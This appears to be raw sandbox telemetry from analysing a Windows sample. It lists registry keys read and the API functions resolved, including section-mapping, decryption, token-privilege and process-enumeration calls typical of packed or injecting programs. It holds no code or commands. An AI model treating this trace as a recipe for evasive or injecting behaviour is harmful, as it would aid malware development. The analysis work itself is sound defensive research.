HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\System.Drawing,2.0.0.0,,b03f5f7f11d50a3a,MSIL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\NI\5bec2d27\74219a81\3d\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\NI\5bec2d27\74219a81\3d\ConfigMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\NI\5bec2d27\74219a81\3d\ConfigString
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\NI\5bec2d27\74219a81\3d\MVID
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\NI\5bec2d27\74219a81\3d\EvalationData
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\NI\5bec2d27\74219a81\3d\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\NI\5bec2d27\74219a81\3d\ILDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\NI\5bec2d27\74219a81\3d\NIDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\NI\5bec2d27\74219a81\3d\MissingDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\IL\2b351479\2a0ed676\72\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\IL\2b351479\2a0ed676\72\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\IL\2b351479\2a0ed676\72\Modules
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\IL\2b351479\2a0ed676\72\SIG
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\IL\2b351479\2a0ed676\72\LastModTime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\IL\74219a81\7cb419c4\3d\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\IL\74219a81\7cb419c4\3d\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\IL\74219a81\7cb419c4\3d\Modules
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\IL\74219a81\7cb419c4\3d\SIG
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\IL\74219a81\7cb419c4\3d\LastModTime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\Microsoft.PowerShell.Commands.Management,1.0.0.0,,31bf3856ad364e35,MSIL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\System.Web.Services,2.0.0.0,,b03f5f7f11d50a3a,MSIL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\NI\19aba884\259d21de\36\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\NI\19aba884\259d21de\36\ConfigMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\NI\19aba884\259d21de\36\ConfigString
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\NI\19aba884\259d21de\36\MVID
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\NI\19aba884\259d21de\36\EvalationData
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\NI\19aba884\259d21de\36\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\NI\19aba884\259d21de\36\ILDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\NI\19aba884\259d21de\36\NIDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\NI\19aba884\259d21de\36\MissingDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\IL\259d21de\372b3ce5\36\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\IL\259d21de\372b3ce5\36\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\IL\259d21de\372b3ce5\36\Modules
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\IL\259d21de\372b3ce5\36\SIG
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\IL\259d21de\372b3ce5\36\LastModTime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\Microsoft.PowerShell.Security,1.0.0.0,,31bf3856ad364e35,MSIL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\.NETFramework\CseOn
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\.NETFramework\TailCallOpt
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\.NETFramework\PInvokeInline
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\.NETFramework\PInvokeCalliOpt
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\.NETFramework\NewGCCalc
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\.NETFramework\TURNOFFDEBUGINFO
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\.NETFramework\DisableHotCold
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\NI\6faf58\19ab8d57\8e\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\NI\6faf58\19ab8d57\8e\ConfigMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\NI\6faf58\19ab8d57\8e\ConfigString
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\NI\6faf58\19ab8d57\8e\MVID
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\NI\6faf58\19ab8d57\8e\EvalationData
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\NI\6faf58\19ab8d57\8e\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\NI\6faf58\19ab8d57\8e\ILDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\NI\6faf58\19ab8d57\8e\NIDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\NI\6faf58\19ab8d57\8e\MissingDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\IL\75638fee\7566cac\8c\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\IL\75638fee\7566cac\8c\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\IL\75638fee\7566cac\8c\Modules
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\IL\75638fee\7566cac\8c\SIG
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\IL\75638fee\7566cac\8c\LastModTime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\System.Data.SqlXml,2.0.0.0,,b77a5c561934e089,MSIL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\NI\5a8de2c3\2b1a4e4\4f\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\NI\5a8de2c3\2b1a4e4\4f\ConfigMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\NI\5a8de2c3\2b1a4e4\4f\ConfigString
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\NI\5a8de2c3\2b1a4e4\4f\MVID
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\NI\5a8de2c3\2b1a4e4\4f\EvalationData
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\NI\5a8de2c3\2b1a4e4\4f\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\NI\5a8de2c3\2b1a4e4\4f\ILDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\NI\5a8de2c3\2b1a4e4\4f\NIDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\NI\5a8de2c3\2b1a4e4\4f\MissingDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\NI\340dcf4c\3a6a696d\7b\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\NI\340dcf4c\3a6a696d\7b\ConfigMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\NI\340dcf4c\3a6a696d\7b\ConfigString
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\NI\340dcf4c\3a6a696d\7b\MVID
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\NI\340dcf4c\3a6a696d\7b\EvalationData
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\NI\340dcf4c\3a6a696d\7b\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\NI\340dcf4c\3a6a696d\7b\ILDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\NI\340dcf4c\3a6a696d\7b\NIDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\NI\340dcf4c\3a6a696d\7b\MissingDependencies
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\SESSION MANAGER\Environment\PSMODULEPATH
HKEY_CURRENT_USER\Environment\PSMODULEPATH
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds\Microsoft.PowerShell\path
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN\StackVersion
HKEY_CURRENT_USER\Control Panel\International\sYearMonth
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\NI\226b2009\5b43ba09\7a\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\NI\226b2009\5b43ba09\7a\ConfigMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\NI\226b2009\5b43ba09\7a\ConfigString
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\NI\226b2009\5b43ba09\7a\MVID
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\NI\226b2009\5b43ba09\7a\EvalationData
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\NI\226b2009\5b43ba09\7a\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\NI\226b2009\5b43ba09\7a\ILDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\NI\226b2009\5b43ba09\7a\NIDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\NI\226b2009\5b43ba09\7a\MissingDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\IL\3d590c3f\59f3b67b\89\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\IL\3d590c3f\59f3b67b\89\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\IL\3d590c3f\59f3b67b\89\Modules
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\IL\3d590c3f\59f3b67b\89\SIG
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\IL\3d590c3f\59f3b67b\89\LastModTime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\Microsoft.VisualC,8.0.0.0,,b03f5f7f11d50a3a,MSIL
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\crypt32\DebugHeapFlags
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds\PipelineMaxStackSizeMB
HKEY_CURRENT_USER\Control Panel\Desktop\PreferredUILanguages
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\NI\159a66b8\424bd4d8\8f\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\NI\159a66b8\424bd4d8\8f\ConfigMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\NI\159a66b8\424bd4d8\8f\ConfigString
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\NI\159a66b8\424bd4d8\8f\MVID
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\NI\159a66b8\424bd4d8\8f\EvalationData
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\NI\159a66b8\424bd4d8\8f\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\NI\159a66b8\424bd4d8\8f\ILDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\NI\159a66b8\424bd4d8\8f\NIDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\NI\159a66b8\424bd4d8\8f\MissingDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\InstallationType
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\.NET CLR Networking\Performance\Library
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\.NET CLR Networking\Performance\IsMultiInstance
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\.NET CLR Networking\Performance\First Counter
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\.NET CLR Networking\Performance\CategoryOptions
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\.NET CLR Networking\Performance\FileMappingSize
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\.NET CLR Networking\Performance\Counter Names
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\NI\db950d6\141dfd70\4e\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\NI\db950d6\141dfd70\4e\ConfigMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\NI\db950d6\141dfd70\4e\ConfigString
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\NI\db950d6\141dfd70\4e\MVID
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\NI\db950d6\141dfd70\4e\EvalationData
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\NI\db950d6\141dfd70\4e\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\NI\db950d6\141dfd70\4e\ILDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\NI\db950d6\141dfd70\4e\NIDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\NI\db950d6\141dfd70\4e\MissingDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\IL\36d1a880\19d63a9c\4a\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\IL\36d1a880\19d63a9c\4a\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\IL\36d1a880\19d63a9c\4a\Modules
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\IL\36d1a880\19d63a9c\4a\SIG
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_64\IL\36d1a880\19d63a9c\4a\LastModTime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\Microsoft.Vsa,8.0.0.0,,b03f5f7f11d50a3a,MSIL
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\en-GB
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\en-GB
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\Locale\00000809
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\Language Groups\1
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Windows Error Reporting\WMR\Disable
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\.NETFramework\FORCE_ASSEMREF_DUPCHECK
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\.NETFramework\NativeUnwindInfo
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\.NETFramework\MD_TrackColDesMisses
HKEY_CURRENT_USER\Control Panel\Personalization\Desktop Slideshow\Interval
HKEY_CURRENT_USER\Control Panel\Personalization\Desktop Slideshow\Shuffle
HKEY_CURRENT_USER\Control Panel\Personalization\Desktop Slideshow\AnimationDuration
HKEY_CURRENT_USER\Control Panel\Personalization\Desktop Slideshow\Flags
HKEY_CURRENT_USER\Software\Classes\Local Settings\MuiCache\37\52C64B7E\LanguageList
HKEY_LOCAL_MACHINE\Software\Microsoft\Tracing\powershell_RASAPI32
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32\EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32\EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32\FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32\ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32\MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32\FileDirectory
lpk.dll.LpkEditControl
version.dll.GetFileVersionInfoA
shfolder.dll.SHGetFolderPathA
shlwapi.dll.#437
cryptbase.dll.SystemFunction036
setupapi.dll.CM_Get_Device_Interface_List_Size_ExW
setupapi.dll.CM_Get_Device_Interface_List_ExW
comctl32.dll.#332
comctl32.dll.#386
kernel32.dll.GetUserDefaultUILanguage
ole32.dll.OleInitialize
propsys.dll.PSCreateMemoryPropertyStore
propsys.dll.PSPropertyBag_WriteDWORD
propsys.dll.PSPropertyBag_ReadDWORD
propsys.dll.PSPropertyBag_ReadGUID
urlmon.dll.CreateUri
kernel32.dll.InitializeSRWLock
kernel32.dll.AcquireSRWLockExclusive
kernel32.dll.AcquireSRWLockShared
kernel32.dll.ReleaseSRWLockExclusive
kernel32.dll.ReleaseSRWLockShared
advapi32.dll.AddMandatoryAce
version.dll.GetFileVersionInfoSizeW
version.dll.GetFileVersionInfoW
version.dll.VerQueryValueW
urlmon.dll.#397
urlmon.dll.#441
urlmon.dll.#395
ole32.dll.OleUninitialize
ole32.dll.CoRevokeInitializeSpy
comctl32.dll.#388
oleaut32.dll.#500
shell32.dll.#680
system.dll.Call
user32.dll.wsprintfA
kernel32.dll.CreateFileA
ntdll.dll.NtCreateSection
ntdll.dll.NtMapViewOfSection
kernel32.dll.ReadFile
kernel32.dll.CloseHandle
system.dll.Int64Op
cryptsp.dll.CryptAcquireContextW
cryptsp.dll.CryptCreateHash
cryptsp.dll.CryptHashData
cryptsp.dll.CryptDeriveKey
cryptsp.dll.CryptDestroyHash
cryptsp.dll.CryptDecrypt
cryptsp.dll.CryptDestroyKey
cryptsp.dll.CryptReleaseContext
advapi32.dll.UnregisterTraceGuids
comctl32.dll.#321
kernel32.dll.FlsAlloc
kernel32.dll.FlsGetValue
kernel32.dll.FlsSetValue
kernel32.dll.FlsFree
ole32.dll.CoCreateInstance
shell32.dll.#66
ole32.dll.CoGetApartmentType
ole32.dll.CoRegisterInitializeSpy
ole32.dll.CoTaskMemFree
comctl32.dll.#236
oleaut32.dll.#6
ole32.dll.CoTaskMemAlloc
ole32.dll.CoGetMalloc
ole32.dll.CoInitializeEx
ole32.dll.CreateBindCtx
comctl32.dll.#320
comctl32.dll.#324
comctl32.dll.#323
advapi32.dll.RegEnumKeyW
oleaut32.dll.#2
advapi32.dll.InitializeSecurityDescriptor
advapi32.dll.SetEntriesInAclW
ntmarta.dll.GetMartaExtensionInterface
advapi32.dll.SetSecurityDescriptorDacl
advapi32.dll.IsTextUnicode
comctl32.dll.#338
comctl32.dll.#339
shell32.dll.#102
ole32.dll.CoUninitialize
comctl32.dll.#385
comctl32.dll.#336
comctl32.dll.#329
comctl32.dll.#333
ntdll.dll.RtlDllShutdownInProgress
sechost.dll.ConvertSidToStringSidW
profapi.dll.#104
linkinfo.dll.CreateLinkInfoW
user32.dll.IsCharAlphaW
user32.dll.CharPrevW
ntshrui.dll.GetNetResourceFromLocalPathW
srvcli.dll.NetShareEnum
cscapi.dll.CscNetApiGetInterface
slc.dll.SLGetWindowsInformationDWORD
shlwapi.dll.PathRemoveFileSpecW
linkinfo.dll.DestroyLinkInfo
propsys.dll.PropVariantToBoolean
ole32.dll.PropVariantClear
cryptsp.dll.CryptGenRandom
advapi32.dll.RegOpenKeyExW
advapi32.dll.RegQueryInfoKeyW
advapi32.dll.RegEnumKeyExW
advapi32.dll.RegEnumValueW
advapi32.dll.RegCloseKey
advapi32.dll.RegQueryValueExW
mscoree.dll.#142
mscoreei.dll.RegisterShimImplCallback
mscoreei.dll.OnShimDllMainCalled
mscoreei.dll.CorBindToRuntimeEx
shlwapi.dll.UrlIsW
kernel32.dll.InitializeCriticalSectionAndSpinCount
msvcrt.dll._set_error_mode
msvcrt.dll.?set_terminate@@YAP6AXXZP6AXXZ@Z
kernel32.dll.FindActCtxSectionStringW
kernel32.dll.GetSystemWindowsDirectoryW
mscoree.dll.GetProcessExecutableHeap
mscoreei.dll.GetProcessExecutableHeap
mscorwks.dll.DllGetClassObjectInternal
mscorwks.dll.GetCLRFunction
advapi32.dll.RegisterTraceGuidsW
advapi32.dll.GetTraceLoggerHandle
advapi32.dll.GetTraceEnableLevel
advapi32.dll.GetTraceEnableFlags
advapi32.dll.TraceEvent
mscoree.dll.IEE
mscoreei.dll.IEE
mscorwks.dll.IEE
mscoree.dll.GetStartupFlags
mscoreei.dll.GetStartupFlags
mscoree.dll.GetHostConfigurationFile
mscoreei.dll.GetHostConfigurationFile
mscoreei.dll.GetCORVersion
mscoree.dll.GetCORSystemDirectory
mscoreei.dll.GetCORSystemDirectory_RetAddr
mscoreei.dll.CreateConfigStream
ntdll.dll.RtlVirtualUnwind
kernel32.dll.IsWow64Process
advapi32.dll.AllocateAndInitializeSid
advapi32.dll.OpenProcessToken
advapi32.dll.GetTokenInformation
advapi32.dll.InitializeAcl
advapi32.dll.AddAccessAllowedAce
advapi32.dll.FreeSid
kernel32.dll.SetThreadStackGuarantee
kernel32.dll.AddVectoredContinueHandler
kernel32.dll.RemoveVectoredContinueHandler
advapi32.dll.ConvertSidToStringSidW
shell32.dll.SHGetFolderPathW
kernel32.dll.FlushProcessWriteBuffers
kernel32.dll.GetWriteWatch
kernel32.dll.ResetWriteWatch
kernel32.dll.CreateMemoryResourceNotification
kernel32.dll.QueryMemoryResourceNotification
kernel32.dll.GlobalMemoryStatusEx
ole32.dll.CoGetContextToken
oleaut32.dll.#149
oleaut32.dll.#9
kernel32.dll.GetVersionExW
kernel32.dll.GetFullPathNameW
kernel32.dll.SetErrorMode
kernel32.dll.GetFileAttributesExW
kernel32.dll.lstrlen
kernel32.dll.lstrlenW
mscoree.dll.ND_RI2
mscoreei.dll.ND_RI2
kernel32.dll.lstrcpy
kernel32.dll.lstrcpyW
version.dll.VerLanguageNameW
kernel32.dll.GetCurrentProcessId
advapi32.dll.LookupPrivilegeValueW
kernel32.dll.GetCurrentProcess
advapi32.dll.AdjustTokenPrivileges
kernel32.dll.OpenProcess
psapi.dll.EnumProcessModules
psapi.dll.GetModuleInformation
psapi.dll.GetModuleBaseNameW
psapi.dll.GetModuleFileNameExW
kernel32.dll.GetExitCodeProcess
ntdll.dll.NtQuerySystemInformation
user32.dll.EnumWindows
user32.dll.GetWindowThreadProcessId
kernel32.dll.WerSetFlags
kernel32.dll.SetThreadPreferredUILanguages
kernel32.dll.GetThreadPreferredUILanguages
kernel32.dll.GetUserDefaultLocaleName
kernel32.dll.GetEnvironmentVariableW
advapi32.dll.CryptAcquireContextA
advapi32.dll.CryptReleaseContext
advapi32.dll.CryptCreateHash
advapi32.dll.CryptDestroyHash
advapi32.dll.CryptHashData
advapi32.dll.CryptGetHashParam
advapi32.dll.CryptImportKey
advapi32.dll.CryptExportKey
advapi32.dll.CryptGenKey
advapi32.dll.CryptGetKeyParam
advapi32.dll.CryptDestroyKey
advapi32.dll.CryptVerifySignatureA
advapi32.dll.CryptSignHashA
advapi32.dll.CryptGetProvParam
advapi32.dll.CryptGetUserKey
advapi32.dll.CryptEnumProvidersA
cryptsp.dll.CryptImportKey
cryptsp.dll.CryptGetHashParam
mscoreei.dll._CorDllMain
mscoree.dll.GetTokenForVTableEntry
mscoree.dll.SetTargetForVTableEntry
mscoree.dll.GetTargetForVTableEntry
mscoreei.dll.LoadLibraryShim
culture.dll.ConvertLangIdToCultureName
ole32.dll.CoCreateGuid
kernel32.dll.CreateFileW
kernel32.dll.GetConsoleScreenBufferInfo
kernel32.dll.LocalFree
kernel32.dll.LocalAlloc
mscoree.dll.ND_RI4
mscoreei.dll.ND_RI4
advapi32.dll.DuplicateTokenEx
advapi32.dll.CheckTokenMembership
kernel32.dll.GetConsoleTitleW
mscorjit.dll.getJit
kernel32.dll.SetConsoleTitleW
kernel32.dll.SetConsoleCtrlHandler
kernel32.dll.SetEnvironmentVariableW
kernel32.dll.CreateEventW
ntdll.dll.WinSqmIsOptedIn
kernel32.dll.ExpandEnvironmentStringsW
shfolder.dll.SHGetFolderPathW
kernel32.dll.GetACP
kernel32.dll.UnmapViewOfFile
kernel32.dll.GetFileType
kernel32.dll.GetSystemInfo
kernel32.dll.VirtualQuery
secur32.dll.GetUserNameExW
advapi32.dll.GetUserNameW
kernel32.dll.ReleaseMutex
advapi32.dll.RegisterEventSourceW
advapi32.dll.DeregisterEventSource
